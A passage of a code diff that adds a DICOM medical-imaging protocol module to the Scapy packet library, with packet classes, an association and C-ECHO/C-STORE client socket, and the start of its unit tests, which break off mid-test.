"""DICOM SCP/SCU Role Selection sub-item.""" + + name = "DICOM SCP/SCU Role Selection" + fields_desc = [ + FieldLenField("uid_length", None, length_of="sop_class_uid", fmt="!H"), + StrLenField("sop_class_uid", b"", + length_from=lambda pkt: pkt.uid_length), + ByteField("scu_role", 0), + ByteField("scp_role", 0), + ] + + def extract_padding(self, s: bytes) -> Tuple[bytes, bytes]: + return b"", s + + def mysummary(self) -> str: + return "RoleSelection SCU=%d SCP=%d" % (self.scu_role, self.scp_role) + + +class DICOMSOPClassExtendedNegotiation(Packet): + """DICOM SOP Class Extended Negotiation sub-item (PS3.7 D.3.3.5).""" + + name = "DICOM SOP Class Extended Negotiation" + fields_desc = [ + FieldLenField("sop_class_uid_length", None, + length_of="sop_class_uid", fmt="!H"), + StrLenField("sop_class_uid", b"", + length_from=lambda pkt: pkt.sop_class_uid_length), + StrLenField("service_class_application_information", b"", + length_from=lambda pkt: ( + pkt.underlayer.length - 2 - pkt.sop_class_uid_length + if pkt.underlayer and pkt.underlayer.length + else 0 + )), + ] + + def extract_padding(self, s: bytes) -> Tuple[bytes, bytes]: + return b"", s + + def mysummary(self) -> str: + return "SOPClassExtNeg %s" % self.sop_class_uid.decode("ascii").rstrip("\x00") + + +class DICOMSOPClassCommonExtendedNegotiation(Packet): + """DICOM SOP Class Common Extended Negotiation sub-item (PS3.7 D.3.3.6).""" + + name = "DICOM SOP Class Common Extended Negotiation" + fields_desc = [ + FieldLenField("sop_class_uid_length", None, + length_of="sop_class_uid", fmt="!H"), + StrLenField("sop_class_uid", b"", + length_from=lambda pkt: pkt.sop_class_uid_length), + FieldLenField("service_class_uid_length", None, + length_of="service_class_uid", fmt="!H"), + StrLenField("service_class_uid", b"", + length_from=lambda pkt: pkt.service_class_uid_length), + FieldLenField("related_sop_class_uid_length", None, + length_of="related_sop_class_uids", fmt="!H"), + StrLenField("related_sop_class_uids", b"", + length_from=lambda pkt: pkt.related_sop_class_uid_length), + ] + + def extract_padding(self, s: bytes) -> Tuple[bytes, bytes]: + return b"", s + + def mysummary(self) -> str: + uid = self.sop_class_uid.decode("ascii").rstrip("\x00") + return "SOPClassCommonExtNeg %s" % uid + + +USER_IDENTITY_TYPES = { + 1: "Username", + 2: "Username and Passcode", + 3: "Kerberos Service Ticket", + 4: "SAML Assertion", + 5: "JSON Web Token (JWT)", +} + + +class DICOMUserIdentity(Packet): + """DICOM User Identity sub-item.""" + + name = "DICOM User Identity" + fields_desc = [ + ByteEnumField("user_identity_type", 1, USER_IDENTITY_TYPES), + ByteField("positive_response_requested", 0), + FieldLenField("primary_field_length", None, + length_of="primary_field", fmt="!H"), + StrLenField("primary_field", b"", + length_from=lambda pkt: pkt.primary_field_length), + ConditionalField( + FieldLenField("secondary_field_length", None, + length_of="secondary_field", fmt="!H"), + lambda pkt: pkt.user_identity_type == 2 + ), + ConditionalField( + StrLenField("secondary_field", b"", + length_from=lambda pkt: pkt.secondary_field_length), + lambda pkt: pkt.user_identity_type == 2 + ), + ] + + def extract_padding(self, s: bytes) -> Tuple[bytes, bytes]: + return b"", s + + def mysummary(self) -> str: + return self.sprintf("UserIdentity %user_identity_type%") + + +class DICOMUserIdentityResponse(Packet): + """DICOM User Identity Server Response sub-item.""" + + name = "DICOM User Identity Response" + fields_desc = [ + FieldLenField("response_length", None, + length_of="server_response", fmt="!H"), + StrLenField("server_response", b"", + length_from=lambda pkt: pkt.response_length), + ] + + def extract_padding(self, s: bytes) -> Tuple[bytes, bytes]: + return b"", s + + def mysummary(self) -> str: + return "UserIdentityResponse" + + +class DICOMUserInformation(Packet): + """DICOM User Information item.""" + + name = "DICOM User Information" + fields_desc = [ + PacketListField( + "sub_items", [], + DICOMVariableItem, + max_count=32, + length_from=lambda pkt: ( + pkt.underlayer.length + if pkt.underlayer and pkt.underlayer.length + else 0 + ) + ), + ] + + def extract_padding(self, s: bytes) -> Tuple[bytes, bytes]: + return b"", s + + def mysummary(self) -> str: + return "UserInfo (%d items)" % len(self.sub_items) + + +bind_layers(DICOMVariableItem, DICOMApplicationContext, item_type=0x10) +bind_layers(DICOMVariableItem, DICOMPresentationContextRQ, item_type=0x20) +bind_layers(DICOMVariableItem, DICOMPresentationContextAC, item_type=0x21) +bind_layers(DICOMVariableItem, DICOMAbstractSyntax, item_type=0x30) +bind_layers(DICOMVariableItem, DICOMTransferSyntax, item_type=0x40) +bind_layers(DICOMVariableItem, DICOMUserInformation, item_type=0x50) +bind_layers(DICOMVariableItem, DICOMMaximumLength, item_type=0x51) +bind_layers(DICOMVariableItem, DICOMImplementationClassUID, item_type=0x52) +bind_layers(DICOMVariableItem, DICOMAsyncOperationsWindow, item_type=0x53) +bind_layers(DICOMVariableItem, DICOMSCPSCURoleSelection, item_type=0x54) +bind_layers(DICOMVariableItem, DICOMImplementationVersionName, item_type=0x55) +bind_layers(DICOMVariableItem, DICOMSOPClassExtendedNegotiation, item_type=0x56) +bind_layers(DICOMVariableItem, DICOMSOPClassCommonExtendedNegotiation, item_type=0x57) +bind_layers(DICOMVariableItem, DICOMUserIdentity, item_type=0x58) +bind_layers(DICOMVariableItem, DICOMUserIdentityResponse, item_type=0x59) +bind_layers(DICOMVariableItem, DICOMGenericItem) + + +class DICOM(Packet): + """DICOM Upper Layer (UL) PDU header.""" + + name = "DICOM UL" + fields_desc = [ + ByteEnumField("pdu_type", 0x01, PDU_TYPES), + ByteField("reserved1", 0), + LenField("length", None, fmt="!I"), + ] + + def extract_padding(self, s: bytes) -> Tuple[bytes, bytes]: + if self.length is not None: + return s[:self.length], s[self.length:] + return s, b"" + + def mysummary(self) -> str: + return self.sprintf("DICOM %pdu_type%") + + +class PresentationDataValueItem(Packet): + """Presentation Data Value (PDV) item within P-DATA-TF PDU.""" + + name = "PresentationDataValueItem" + fields_desc = [ + FieldLenField("length", None, length_of="data", fmt="!I", + adjust=lambda pkt, x: x + 2), + ByteField("context_id", 1), + BitField("reserved_bits", 0, 6), + BitField("is_last", 0, 1), + BitField("is_command", 0, 1), + StrLenField("data", b"", + length_from=lambda pkt: max(0, (pkt.length or 2) - 2)), + ] + + def extract_padding(self, s: bytes) -> Tuple[bytes, bytes]: + return b"", s + + def mysummary(self) -> str: + cmd_or_data = "CMD" if self.is_command else "DATA" + last = " LAST" if self.is_last else "" + return "PDV ctx=%d %s%s len=%d" % ( + self.context_id, cmd_or_data, last, len(self.data) + ) + + +class A_ASSOCIATE_RQ(Packet): + """A-ASSOCIATE-RQ PDU for initiating DICOM associations.""" + + name = "A-ASSOCIATE-RQ" + fields_desc = [ + ShortField("protocol_version", 1), + ShortField("reserved1", 0), + DICOMAETitleField("called_ae_title", b""), + DICOMAETitleField("calling_ae_title", b""), + StrFixedLenField("reserved2", b"\x00" * 32, 32), + PacketListField( + "variable_items", [], + DICOMVariableItem, + max_count=256, + length_from=lambda pkt: ( + pkt.underlayer.length - 68 + if pkt.underlayer and pkt.underlayer.length + else 0 + ) + ), + ] + + def mysummary(self) -> str: + called = self.called_ae_title.strip().decode("ascii", errors="replace") + calling = self.calling_ae_title.strip().decode("ascii", errors="replace") + return "A-ASSOCIATE-RQ %s -> %s" % (calling, called) + + def hashret(self) -> bytes: + return self.called_ae_title + self.calling_ae_title + + +class A_ASSOCIATE_AC(Packet): + """A-ASSOCIATE-AC PDU for accepting DICOM associations.""" + + name = "A-ASSOCIATE-AC" + fields_desc = [ + ShortField("protocol_version", 1), + ShortField("reserved1", 0), + DICOMAETitleField("called_ae_title", b""), + DICOMAETitleField("calling_ae_title", b""), + StrFixedLenField("reserved2", b"\x00" * 32, 32), + PacketListField( + "variable_items", [], + DICOMVariableItem, + max_count=256, + length_from=lambda pkt: ( + pkt.underlayer.length - 68 + if pkt.underlayer and pkt.underlayer.length + else 0 + ) + ), + ] + + def mysummary(self) -> str: + called = self.called_ae_title.strip().decode("ascii", errors="replace") + calling = self.calling_ae_title.strip().decode("ascii", errors="replace") + return "A-ASSOCIATE-AC %s <- %s" % (calling, called) + + def hashret(self) -> bytes: + return self.called_ae_title + self.calling_ae_title + + def answers(self, other: Packet) -> bool: + return isinstance(other, A_ASSOCIATE_RQ) + + +class A_ASSOCIATE_RJ(Packet): + """A-ASSOCIATE-RJ PDU for rejecting DICOM associations.""" + + name = "A-ASSOCIATE-RJ" + + RESULT_CODES = { + 1: "rejected-permanent", + 2: "rejected-transient", + } + + SOURCE_CODES = { + 1: "DICOM UL service-user", + 2: "DICOM UL service-provider (ACSE)", + 3: "DICOM UL service-provider (Presentation)", + } + + fields_desc = [ + ByteField("reserved1", 0), + ByteEnumField("result", 1, RESULT_CODES), + ByteEnumField("source", 1, SOURCE_CODES), + ByteField("reason_diag", 1), + ] + + def mysummary(self) -> str: + return self.sprintf("A-ASSOCIATE-RJ %result% %source%") + + def answers(self, other: Packet) -> bool: + return isinstance(other, A_ASSOCIATE_RQ) + + +class P_DATA_TF(Packet): + """P-DATA-TF PDU for transferring DICOM data.""" + + name = "P-DATA-TF" + fields_desc = [ + PacketListField( + "pdv_items", [], + PresentationDataValueItem, + max_count=256, + length_from=lambda pkt: ( + pkt.underlayer.length + if pkt.underlayer and pkt.underlayer.length + else 0 + ) + ), + ] + + def mysummary(self) -> str: + return "P-DATA-TF (%d PDVs)" % len(self.pdv_items) + + +class A_RELEASE_RQ(Packet): + """A-RELEASE-RQ PDU for requesting association release.""" + + name = "A-RELEASE-RQ" + fields_desc = [IntField("reserved1", 0)] + + def mysummary(self) -> str: + return "A-RELEASE-RQ" + + +class A_RELEASE_RP(Packet): + """A-RELEASE-RP PDU for confirming association release.""" + + name = "A-RELEASE-RP" + fields_desc = [IntField("reserved1", 0)] + + def mysummary(self) -> str: + return "A-RELEASE-RP" + + def answers(self, other: Packet) -> bool: + return isinstance(other, A_RELEASE_RQ) + + +class A_ABORT(Packet): + """A-ABORT PDU for aborting DICOM associations.""" + + name = "A-ABORT" + + SOURCE_CODES = { + 0: "DICOM UL service-user", + 2: "DICOM UL service-provider", + } + + fields_desc = [ + ByteField("reserved1", 0), + ByteField("reserved2", 0), + ByteEnumField("source", 0, SOURCE_CODES), + ByteField("reason_diag", 0), + ] + + def mysummary(self) -> str: + return self.sprintf("A-ABORT %source%") + + +bind_layers(TCP, DICOM, dport=DICOM_PORT) +bind_layers(TCP, DICOM, sport=DICOM_PORT) +bind_layers(TCP, DICOM, dport=DICOM_PORT_ALT) +bind_layers(TCP, DICOM, sport=DICOM_PORT_ALT) +bind_layers(DICOM, A_ASSOCIATE_RQ, pdu_type=0x01) +bind_layers(DICOM, A_ASSOCIATE_AC, pdu_type=0x02) +bind_layers(DICOM, A_ASSOCIATE_RJ, pdu_type=0x03) +bind_layers(DICOM, P_DATA_TF, pdu_type=0x04) +bind_layers(DICOM, A_RELEASE_RQ, pdu_type=0x05) +bind_layers(DICOM, A_RELEASE_RP, pdu_type=0x06) +bind_layers(DICOM, A_ABORT, pdu_type=0x07) + + +def build_presentation_context_rq(context_id: int, + abstract_syntax_uid: str, + transfer_syntax_uids: List[str]) -> Packet: + """Build a Presentation Context RQ item.""" + abs_uid = _uid_to_bytes(abstract_syntax_uid) + abs_syn = DICOMVariableItem() / DICOMAbstractSyntax(uid=abs_uid) + + sub_items = [abs_syn] + for ts_uid in transfer_syntax_uids: + ts = DICOMVariableItem() / DICOMTransferSyntax(uid=_uid_to_bytes(ts_uid)) + sub_items.append(ts) + + return DICOMVariableItem() / DICOMPresentationContextRQ( + context_id=context_id, + sub_items=sub_items, + ) + + +def build_user_information(max_pdu_length: int = 16384, + implementation_class_uid: Optional[str] = None, + implementation_version: Optional[Union[str, bytes]] = None + ) -> Packet: + """Build a User Information item.""" + sub_items = [ + DICOMVariableItem() / DICOMMaximumLength(max_pdu_length=max_pdu_length) + ] + + if implementation_class_uid: + uid = _uid_to_bytes(implementation_class_uid) + sub_items.append( + DICOMVariableItem() / DICOMImplementationClassUID(uid=uid) + ) + + if implementation_version: + if isinstance(implementation_version, bytes): + ver_bytes = implementation_version + else: + ver_bytes = implementation_version.encode('ascii') + sub_items.append( + DICOMVariableItem() / DICOMImplementationVersionName(name=ver_bytes) + ) + + return DICOMVariableItem() / DICOMUserInformation(sub_items=sub_items) + + +class DICOMSocket: + """DICOM application-layer socket for associations and DIMSE operations.""" + + def __init__(self, dst_ip: str, dst_port: int, dst_ae: str, + src_ae: str = "SCAPY_SCU", read_timeout: int = 10) -> None: + self.dst_ip = dst_ip + self.dst_port = dst_port + self.dst_ae = dst_ae + self.src_ae = src_ae + self.sock: Optional[socket.socket] = None + self.stream: Optional[StreamSocket] = None + self.assoc_established = False + self.accepted_contexts: Dict[int, Tuple[str, str]] = {} + self.read_timeout = read_timeout + self._current_message_id_counter = int(time.time()) % 50000 + self._proposed_max_pdu = 16384 + self.max_pdu_length = 16384 + self._proposed_context_map: Dict[int, str] = {} + + def __enter__(self) -> Self: + return self + + def __exit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> bool: + if self.assoc_established: + try: + self.release() + except (socket.error, socket.timeout, OSError): + pass + self.close() + return False + + def connect(self) -> bool: + try: + self.sock = socket.create_connection( + (self.dst_ip, self.dst_port), + timeout=self.read_timeout, + ) + self.stream = StreamSocket(self.sock, basecls=DICOM) + return True + except (socket.error, socket.timeout, OSError) as e: + log.error("Connection failed: %s", e) + return False + + def send(self, pkt: Packet) -> None: + self.stream.send(pkt) + + def recv(self) -> Optional[Packet]: + try: + return self.stream.recv() + except socket.timeout: + return None + except (socket.error, OSError) as e: + log.error("Error receiving PDU: %s", e) + return None + + def sr1(self, *args, **kargs): + # type: (*Any, **Any) -> Optional[Packet] + """Send one packet and receive one answer.""" + timeout = kargs.pop("timeout", self.read_timeout) + try: + return self.stream.sr1(*args, timeout=timeout, **kargs) + except (socket.error, OSError) as e: + log.error("Error in sr1: %s", e) + return None + + def send_raw_bytes(self, raw_bytes: bytes) -> None: + self.sock.sendall(raw_bytes) + + def associate(self, requested_contexts: Optional[Dict[str, List[str]]] = None + ) -> bool: + if not self.stream and not self.connect(): + return False + + if requested_contexts is None: + requested_contexts = { + VERIFICATION_SOP_CLASS_UID: [DEFAULT_TRANSFER_SYNTAX_UID] + } + + self._proposed_context_map = {} + + variable_items: List[Packet] = [ + DICOMVariableItem() / DICOMApplicationContext() + ] + + ctx_id = 1 + for abs_syntax, trn_syntaxes in requested_contexts.items(): + self._proposed_context_map[ctx_id] = abs_syntax + pctx = build_presentation_context_rq(ctx_id, abs_syntax, trn_syntaxes) + variable_items.append(pctx) + ctx_id += 2 + + user_info = build_user_information(max_pdu_length=self._proposed_max_pdu) + variable_items.append(user_info) + + assoc_rq = DICOM() / A_ASSOCIATE_RQ( + called_ae_title=self.dst_ae, + calling_ae_title=self.src_ae, + variable_items=variable_items, + ) + + response = self.sr1(assoc_rq) + + if response: + if response.haslayer(A_ASSOCIATE_AC): + self.assoc_established = True + self._parse_accepted_contexts(response) + self._parse_max_pdu_length(response) + return True + elif response.haslayer(A_ASSOCIATE_RJ): + log.error( + "Association rejected: result=%d, source=%d, reason=%d", + response[A_ASSOCIATE_RJ].result, + response[A_ASSOCIATE_RJ].source, + response[A_ASSOCIATE_RJ].reason_diag, + ) + return False + + log.error("Association failed: no valid response received") + return False + + def _parse_max_pdu_length(self, response: Packet) -> None: + try: + for item in response[A_ASSOCIATE_AC].variable_items: + if item.item_type != 0x50: + continue + if not item.haslayer(DICOMUserInformation): + continue + user_info = item[DICOMUserInformation] + for sub_item in user_info.sub_items: + if sub_item.item_type != 0x51: + continue + if not sub_item.haslayer(DICOMMaximumLength): + continue + max_len = sub_item[DICOMMaximumLength] + server_max = max_len.max_pdu_length + self.max_pdu_length = min( + self._proposed_max_pdu, server_max + ) + return + except (KeyError, IndexError, AttributeError): + pass + self.max_pdu_length = self._proposed_max_pdu + + def _parse_accepted_contexts(self, response: Packet) -> None: + for item in response[A_ASSOCIATE_AC].variable_items: + if item.item_type != 0x21: + continue + if not item.haslayer(DICOMPresentationContextAC): + continue + pctx = item[DICOMPresentationContextAC] + ctx_id = pctx.context_id + result = pctx.result + + if result != 0: + continue + + abs_syntax = self._proposed_context_map.get(ctx_id) + if abs_syntax is None: + continue + + for sub_item in pctx.sub_items: + if sub_item.item_type != 0x40: + continue + if not sub_item.haslayer(DICOMTransferSyntax): + continue + ts_uid = sub_item[DICOMTransferSyntax].uid + ts_uid = ts_uid.rstrip(b"\x00").decode("ascii") + self.accepted_contexts[ctx_id] = (abs_syntax, ts_uid) + break + + def _get_next_message_id(self) -> int: + self._current_message_id_counter += 1 + return self._current_message_id_counter & 0xFFFF + + def _find_accepted_context_id(self, sop_class_uid: str, + transfer_syntax_uid: Optional[str] = None + ) -> Optional[int]: + for ctx_id, (abs_syntax, ts_syntax) in self.accepted_contexts.items(): + if abs_syntax == sop_class_uid: + if transfer_syntax_uid is None or transfer_syntax_uid == ts_syntax: + return ctx_id + return None + + def c_echo(self) -> Optional[int]: + if not self.assoc_established: + log.error("Association not established") + return None + + echo_ctx_id = self._find_accepted_context_id(VERIFICATION_SOP_CLASS_UID) + if echo_ctx_id is None: + log.error("No accepted context for Verification SOP Class") + return None + + msg_id = self._get_next_message_id() + dimse_rq = bytes(C_ECHO_RQ(message_id=msg_id)) + + pdv_rq = PresentationDataValueItem( + context_id=echo_ctx_id, + data=dimse_rq, + is_command=1, + is_last=1, + ) + pdata_rq = DICOM() / P_DATA_TF(pdv_items=[pdv_rq]) + + response = self.sr1(pdata_rq) + + if response and response.haslayer(P_DATA_TF): + pdv_items = response[P_DATA_TF].pdv_items + if pdv_items: + pdv_rsp = pdv_items[0] + return parse_dimse_status(pdv_rsp.data) + return None + + def c_store(self, dataset_bytes: bytes, sop_class_uid: str, + sop_instance_uid: str, transfer_syntax_uid: str + ) -> Optional[int]: + if not self.assoc_established: + log.error("Association not established") + return None + + store_ctx_id = self._find_accepted_context_id( + sop_class_uid, + transfer_syntax_uid, + ) + if store_ctx_id is None: + log.error( + "No accepted context for SOP %s with TS %s", + sop_class_uid, + transfer_syntax_uid, + ) + return None + + msg_id = self._get_next_message_id() + + dimse_rq = bytes(C_STORE_RQ( + affected_sop_class_uid=sop_class_uid, + affected_sop_instance_uid=sop_instance_uid, + message_id=msg_id, + )) + + cmd_pdv = PresentationDataValueItem( + context_id=store_ctx_id, + data=dimse_rq, + is_command=1, + is_last=1, + ) + pdata_cmd = DICOM() / P_DATA_TF(pdv_items=[cmd_pdv]) + self.send(pdata_cmd) + + max_pdv_data = self.max_pdu_length - 12 + + if len(dataset_bytes) <= max_pdv_data: + data_pdv = PresentationDataValueItem( + context_id=store_ctx_id, + data=dataset_bytes, + is_command=0, + is_last=1, + ) + pdata_data = DICOM() / P_DATA_TF(pdv_items=[data_pdv]) + self.send(pdata_data) + else: + offset = 0 + while offset < len(dataset_bytes): + chunk = dataset_bytes[offset:offset + max_pdv_data] + is_last = 1 if (offset + len(chunk) >= len(dataset_bytes)) else 0 + data_pdv = PresentationDataValueItem( + context_id=store_ctx_id, + data=chunk, + is_command=0, + is_last=is_last, + ) + pdata_data = DICOM() / P_DATA_TF(pdv_items=[data_pdv]) + self.send(pdata_data) + offset += len(chunk) + + response = self.recv() + + if response and response.haslayer(P_DATA_TF): + pdv_items = response[P_DATA_TF].pdv_items + if pdv_items: + pdv_rsp = pdv_items[0] + return parse_dimse_status(pdv_rsp.data) + return None + + def release(self) -> bool: + if not self.assoc_established: + return True + + release_rq = DICOM() / A_RELEASE_RQ() + response = self.sr1(release_rq) + self.close() + + if response: + return response.haslayer(A_RELEASE_RP) + return False + + def close(self) -> None: + if self.stream: + try: + self.stream.close() + except (socket.error, OSError): + pass + self.sock = None + self.stream = None + self.assoc_established = False diff --git a/test/contrib/dicom.uts b/test/contrib/dicom.uts new file mode 100644 index 00000000000..b9490fda332 --- /dev/null +++ b/test/contrib/dicom.uts @@ -0,0 +1,576 @@ +% DICOM (Digital Imaging and Communications in Medicine) tests + +# Type the following command to launch the tests: +# $ test/run_tests -P "load_contrib('dicom')" -t test/contrib/dicom.uts + +############ +############ ++ DICOM module loading + += Import DICOM module +load_contrib("dicom", globals_dict=globals()) + += Verify essential classes are exported +assert DICOM is not None +assert A_ASSOCIATE_RQ is not None +assert A_ASSOCIATE_AC is not None +assert A_ASSOCIATE_RJ is not None +assert P_DATA_TF is not None +assert A_RELEASE_RQ is not None +assert A_RELEASE_RP is not None +assert A_ABORT is not None +assert DICOMVariableItem is not None +assert DICOMApplicationContext is not None +assert DICOMPresentationContextRQ is not None +assert DICOMUserInformation is not None +assert DICOMMaximumLength is not None + += Verify DIMSE packet classes are exported +assert C_ECHO_RQ is not None +assert C_ECHO_RSP is not None +assert C_STORE_RQ is not None +assert C_STORE_RSP is not None +assert C_FIND_RQ is not None +assert C_FIND_RSP is not None +assert C_MOVE_RQ is not None +assert C_MOVE_RSP is not None +assert C_GET_RQ is not None +assert C_GET_RSP is not None + += Verify constants are exported +assert DICOM_PORT == 104 +assert APP_CONTEXT_UID == "1.2.840.10008.3.1.1.1" +assert DEFAULT_TRANSFER_SYNTAX_UID == "1.2.840.10008.1.2" +assert VERIFICATION_SOP_CLASS_UID == "1.2.840.10008.1.1" + += Verify Query/Retrieve SOP Class UIDs are exported +assert PATIENT_ROOT_QR_FIND_SOP_CLASS_UID == "1.2.840.10008.5.1.4.1.2.1.1" +assert PATIENT_ROOT_QR_MOVE_SOP_CLASS_UID == "1.2.840.10008.5.1.4.1.2.1.2" +assert PATIENT_ROOT_QR_GET_SOP_CLASS_UID == "1.2.840.10008.5.1.4.1.2.1.3" +assert STUDY_ROOT_QR_FIND_SOP_CLASS_UID == "1.2.840.10008.5.1.4.1.2.2.1" +assert STUDY_ROOT_QR_MOVE_SOP_CLASS_UID == "1.2.840.10008.5.1.4.1.2.2.2" +assert STUDY_ROOT_QR_GET_SOP_CLASS_UID == "1.2.840.10008.5.1.4.1.2.2.3" + +############ +############ ++ PDU header tests + += DICOM PDU header construction +pkt = DICOM() +assert pkt.pdu_type == 0x01 +assert pkt.reserved1 == 0 + += DICOM PDU type field values +import struct +for pdu_type, expected_class in [(0x01, A_ASSOCIATE_RQ), (0x02, A_ASSOCIATE_AC), + (0x03, A_ASSOCIATE_RJ), (0x04, P_DATA_TF), + (0x05, A_RELEASE_RQ), (0x06, A_RELEASE_RP), + (0x07, A_ABORT)]: + pkt = DICOM() / expected_class() + raw_bytes = bytes(pkt) + assert raw_bytes[0] == pdu_type + +############ +############ ++ LenField auto-calculation tests + += DICOM header auto-calculates payload length +pkt = DICOM() / A_RELEASE_RQ() +raw = bytes(pkt) +length_field = struct.unpack("!I", raw[2:6])[0] +payload_size = len(raw) - 6 +assert length_field == payload_size +assert length_field == 4 + += Variable item length auto-calculated +pkt = DICOMVariableItem() / DICOMApplicationContext() +raw = bytes(pkt) +length_field = struct.unpack("!H", raw[2:4])[0] +payload_size = len(raw) - 4 +assert length_field == payload_size + += Nested items have correct cumulative length +max_len = DICOMVariableItem() / DICOMMaximumLength(max_pdu_length=16384) +user_info = DICOMVariableItem() / DICOMUserInformation(sub_items=[max_len]) +raw = bytes(user_info) +assert len(raw) == 12 +ui_length = struct.unpack("!H", raw[2:4])[0] +assert ui_length == 8 + +############ +############ ++ Variable item bind_layers tests + += Application Context bind_layers (type 0x10) +pkt = DICOMVariableItem() / DICOMApplicationContext() +assert pkt.item_type == 0x10 +raw = bytes(pkt) +parsed = DICOMVariableItem(raw) +assert parsed.item_type == 0x10 +assert parsed.haslayer(DICOMApplicationContext) + += Abstract Syntax bind_layers (type 0x30) +uid = _uid_to_bytes(VERIFICATION_SOP_CLASS_UID) +pkt = DICOMVariableItem() / DICOMAbstractSyntax(uid=uid) +assert pkt.item_type == 0x30 +raw = bytes(pkt) +parsed = DICOMVariableItem(raw) +assert parsed.item_type == 0x30 +assert parsed.haslayer(DICOMAbstractSyntax) +assert parsed[DICOMAbstractSyntax].uid == uid + += Transfer Syntax bind_layers (type 0x40) +pkt = DICOMVariableItem() / DICOMTransferSyntax() +assert pkt.item_type == 0x40 +raw = bytes(pkt) +parsed = DICOMVariableItem(raw) +assert parsed.item_type == 0x40 +assert parsed.haslayer(DICOMTransferSyntax) + += Maximum Length bind_layers (type 0x51) +pkt = DICOMVariableItem() / DICOMMaximumLength(max_pdu_length=32768) +assert pkt.item_type == 0x51 +raw = bytes(pkt) +parsed = DICOMVariableItem(raw) +assert parsed.item_type == 0x51 +assert parsed.haslayer(DICOMMaximumLength) +assert parsed[DICOMMaximumLength].max_pdu_length == 32768 + += User Information bind_layers (type 0x50) +max_len = DICOMVariableItem() / DICOMMaximumLength(max_pdu_length=16384) +pkt = DICOMVariableItem() / DICOMUserInformation(sub_items=[max_len]) +assert pkt.item_type == 0x50 +raw = bytes(pkt) +parsed = DICOMVariableItem(raw) +assert parsed.item_type == 0x50 +assert parsed.haslayer(DICOMUserInformation) + += Presentation Context RQ bind_layers (type 0x20) +abs_syn = DICOMVariableItem() / DICOMAbstractSyntax(uid=_uid_to_bytes(VERIFICATION_SOP_CLASS_UID)) +ts = DICOMVariableItem() / DICOMTransferSyntax() +pkt = DICOMVariableItem() / DICOMPresentationContextRQ(context_id=1, sub_items=[abs_syn, ts]) +assert pkt.item_type == 0x20 +raw = bytes(pkt) +parsed = DICOMVariableItem(raw) +assert parsed.item_type == 0x20 +assert parsed.haslayer(DICOMPresentationContextRQ) +assert parsed[DICOMPresentationContextRQ].context_id == 1 + += Presentation Context AC bind_layers (type 0x21) +ts = DICOMVariableItem() / DICOMTransferSyntax() +pkt = DICOMVariableItem() / DICOMPresentationContextAC(context_id=1, result=0, sub_items=[ts]) +assert pkt.item_type == 0x21 +raw = bytes(pkt) +parsed = DICOMVariableItem(raw) +assert parsed.item_type == 0x21 +assert parsed.haslayer(DICOMPresentationContextAC) +assert parsed[DICOMPresentationContextAC].result == 0 + += Unknown item type uses guess_payload_class fallback +raw = struct.pack("!BBH", 0xFF, 0, 4) + b"test" +parsed = DICOMVariableItem(raw) +assert parsed.item_type == 0xFF +assert parsed.length == 4 +assert parsed.payload is not None + +############ +############ ++ A-ASSOCIATE-RQ tests + += Build simple A-ASSOCIATE-RQ +app_ctx = DICOMVariableItem() / DICOMApplicationContext() +pctx = build_presentation_context_rq(1, VERIFICATION_SOP_CLASS_UID, [DEFAULT_TRANSFER_SYNTAX_UID]) +user_info = build_user_information(max_pdu_length=16384) +assoc_rq = DICOM() / A_ASSOCIATE_RQ( + called_ae_title=b"TARGET", + calling_ae_title=b"SOURCE", + variable_items=[app_ctx, pctx, user_info] +) +raw = bytes(assoc_rq) +parsed = DICOM(raw) +assert parsed.haslayer(A_ASSOCIATE_RQ) +items = parsed[A_ASSOCIATE_RQ].variable_items +assert len(items) == 3 +assert items[0].item_type == 0x10 +assert items[1].item_type == 0x20 +assert items[2].item_type == 0x50 + += A-ASSOCIATE-RQ AE titles are space-padded by DICOMAETitleField +original = DICOM() / A_ASSOCIATE_RQ( + called_ae_title=b"TARGET", + calling_ae_title=b"SOURCE", +) +serialized = bytes(original) +parsed = DICOM(serialized) +assert parsed.haslayer(A_ASSOCIATE_RQ) +assert parsed[A_ASSOCIATE_RQ].called_ae_title == b"TARGET " +assert parsed[A_ASSOCIATE_RQ].calling_ae_title == b"SOURCE " + += A-ASSOCIATE-RQ with multiple presentation contexts +app_ctx = DICOMVariableItem() / DICOMApplicationContext() +pctx1 = build_presentation_context_rq(1, VERIFICATION_SOP_CLASS_UID, [DEFAULT_TRANSFER_SYNTAX_UID]) +pctx2 = build_presentation_context_rq(3, CT_IMAGE_STORAGE_SOP_CLASS_UID, [DEFAULT_TRANSFER_SYNTAX_UID]) +user_info = build_user_information() +assoc_rq = DICOM() / A_ASSOCIATE_RQ( + called_ae_title=b"TARGET", + calling_ae_title=b"SOURCE", + variable_items=[app_ctx, pctx1, pctx2, user_info] +) +raw = bytes(assoc_rq) +parsed = DICOM(raw) +items = parsed[A_ASSOCIATE_RQ].variable_items +assert len(items) == 4 +pctx_items = [i for i in items if i.item_type == 0x20] +assert len(pctx_items) == 2 +assert pctx_items[0][DICOMPresentationContextRQ].context_id == 1 +assert pctx_items[1][DICOMPresentationContextRQ].context_id == 3 + +############ +############ ++ A-ASSOCIATE-RJ tests + += A-ASSOCIATE-RJ construction and parsing +pkt = DICOM() / A_ASSOCIATE_RJ(result=1, source=2, reason_diag=2) +reparsed = DICOM(bytes(pkt)) +assert reparsed.haslayer(A_ASSOCIATE_RJ) +assert reparsed[A_ASSOCIATE_RJ].source == 2 + +############ +############ ++ A-RELEASE tests + += A-RELEASE-RQ round-trip +original = DICOM() / A_RELEASE_RQ() +serialized = bytes(original) +parsed = DICOM(serialized) +assert parsed.haslayer(A_RELEASE_RQ) + += A-RELEASE-RP round-trip +original = DICOM() / A_RELEASE_RP() +serialized = bytes(original) +parsed = DICOM(serialized) +assert parsed.haslayer(A_RELEASE_RP) + +############ +############ ++ A-ABORT tests + += A-ABORT round-trip +original = DICOM() / A_ABORT(source=2, reason_diag=6) +serialized = bytes(original) +parsed = DICOM(serialized) +assert parsed.haslayer(A_ABORT) +assert parsed[A_ABORT].source == 2 +assert parsed[A_ABORT].reason_diag == 6 + +############ +############ ++ P-DATA-TF tests + += PresentationDataValueItem length linked to data +test_data = b"TEST_DATA_12345" +pdv = PresentationDataValueItem(context_id=1, data=test_data, is_command=1, is_last=1) +raw = bytes(pdv) +length = struct.unpack("!I", raw[:4])[0] +assert length == len(test_data) + 2 + += P-DATA-TF with multiple PDV items - build only +pdv1 = PresentationDataValueItem(context_id=1, data=b'\xDE\xAD', is_command=1, is_last=0) +pdv2 = PresentationDataValueItem(context_id=1, data=b'\xBE\xEF', is_command=0, is_last=1) +pkt = DICOM() / 